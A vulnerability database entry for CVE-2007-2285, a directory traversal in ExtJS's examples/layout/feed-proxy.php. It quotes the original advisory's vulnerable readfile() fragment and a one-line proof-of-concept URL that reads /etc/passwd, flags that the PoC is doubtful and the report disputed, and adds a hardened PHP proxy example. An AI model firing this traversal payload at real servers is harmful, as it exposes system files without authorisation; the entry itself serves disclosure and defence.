Jack Slocum Ext 'Feed-Proxy.PHP' Directory Traversal Vulnerability

Vulnerability ID: 1112798    Type: Path traversal
Published: 2007-04-25    Updated: 2007-04-27
CVE ID: CVE-2007-2285    CNNVD ID: CNNVD-200704-528
Platform: PHP    CVSS score: 7.8
|Sources
https://www.exploit-db.com/exploits/3800
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-528
|Details
A directory traversal vulnerability exists in examples/layout/feed-proxy.php of Jack Slocum Ext (ExtJS). A remote attacker can read arbitrary files by supplying .. sequences in the feed parameter. The script hands the feed parameter to readfile() and returns the result with a text/xml content type, so any file the web server user can read is disclosed to the client.

Two points a practitioner should check before relying on the published proof of concept. First, the PoC path http../../../../../../etc/passwd does not traverse anywhere on a normal filesystem: readfile() treats http.. as a directory name relative to the working directory, and the following .. components can only be resolved if that directory exists. A plain relative or absolute path in the feed parameter is the realistic test case. Second, the three VIM list threads in the references below carry "False:" in their subject, that is, the validity of the original report was disputed there; the CVE entry and the CNNVD record were nevertheless published.
|Exploit
#  ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
# D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com
# V.Code In /examples/layout/feed-proxy.php

----------------------------------------------------------

// Fragment as quoted in the original post; the opening of the enclosing
// block (and the assignment of $feed from the request) is not shown.
    header('Content-Type: text/xml');
    readfile($feed);   // $feed is the request's feed parameter, used unchecked
    return;
}
?>

----------------------------------------------------------

# Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../../etc/passwd

# Greetz To: AsbMay's Group & City Of Ghost Team

# milw0rm.com [2007-04-25]
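The following is an added example of how the same feed-proxy pattern is written safely. It is not ExtJS code and not the patched feed-proxy.php; the host names are constructed for the example, and it assumes the proxy only needs to reach a known set of upstream hosts and that the curl extension is available. The PoC's "http" prefix suggests the original script at most checked that the parameter began with that string; that is an assumption, and the point of the example is that such a prefix test accepts "http../../..." while parsing the URL and validating scheme and host does not, and that restricting the fetcher itself to HTTP(S) keeps a validation slip from turning into local file access.

```php
<?php
// Added example (not ExtJS/feed-proxy.php code): a hardened feed proxy that
// never hands the request parameter to a filesystem function.
// Assumptions (constructed for this example): the set of upstream feed hosts
// is known in advance, and PHP's curl extension is available.

const ALLOWED_FEED_HOSTS = ['feeds.example.com', 'rss.example.org'];

/**
 * Validate an untrusted feed parameter. Returns a normalised URL or null.
 * A bare prefix test such as strpos($feed, 'http') === 0 accepts
 * "http../../etc/passwd"; checking scheme, host and path separately does not.
 */
function validateFeedUrl(string $feed, array $allowedHosts): ?string
{
    // Reject oversized input and control characters (NUL, CR, LF) up front.
    if (strlen($feed) > 2048 || preg_match('/[\x00-\x1f\x7f]/', $feed)) {
        return null;
    }
    $parts = parse_url($feed);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;            // "http../../etc/passwd" has no host: rejected here
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;            // no file://, php://, ftp://, data: ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;            // no credentials embedded in the URL
    }
    $host = strtolower($parts['host']);
    if (!in_array($host, $allowedHosts, true)) {
        return null;            // only known upstream feed hosts
    }
    $path = $parts['path'] ?? '/';
    if (strpos($path, '..') !== false) {
        return null;            // defence in depth: keep traversal out of the path too
    }
    $port  = isset($parts['port'])  ? ':' . $parts['port']  : '';
    $query = isset($parts['query']) ? '?' . $parts['query'] : '';
    return $scheme . '://' . $host . $port . $path . $query;
}

/**
 * Fetch the feed over HTTP(S) only. Limiting curl's protocols means that even
 * a bug in validation cannot make this function read a local file.
 */
function fetchFeed(string $url): ?string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                     // no redirect games
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 5 * 1024 * 1024,           // cap the response size
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return ($body !== false && $status === 200) ? $body : null;
}

// Request handling: a malformed or unknown feed gets a 400, never a file read.
$feed = isset($_GET['feed']) ? (string) $_GET['feed'] : '';
$url  = validateFeedUrl($feed, ALLOWED_FEED_HOSTS);
if ($url === null) {
    http_response_code(400);
    exit('invalid feed');
}
$body = fetchFeed($url);
if ($body === null) {
    http_response_code(502);
    exit('upstream fetch failed');
}
header('Content-Type: text/xml');
echo $body;
```

With this in place the published PoC, as well as plain inputs such as /etc/passwd or ../../../../etc/passwd, fail at the parse_url step because they have no scheme and host, and a URL that does parse still has to name an allowlisted host. If the set of feeds is small and fixed, an even simpler design is to map a short key (feed=news) to a hard-coded URL on the server side and never parse client-supplied URLs at all.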
|References

BID 23643: http://www.securityfocus.com/bid/23643
MILW0RM 3800: http://www.milw0rm.com/exploits/3800
OSVDB 35561: http://osvdb.org/35561
VIM 20070426 re: False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure: http://attrition.org/pipermail/vim/2007-April/001549.html
VIM 20070426 Re: False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure: http://attrition.org/pipermail/vim/2007-April/001546.html
VIM 20070426 False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure: http://attrition.org/pipermail/vim/2007-April/001545.html
XF ext-feedproxy-directory-traversal (33864): http://xforce.iss.net/xforce/xfdb/33864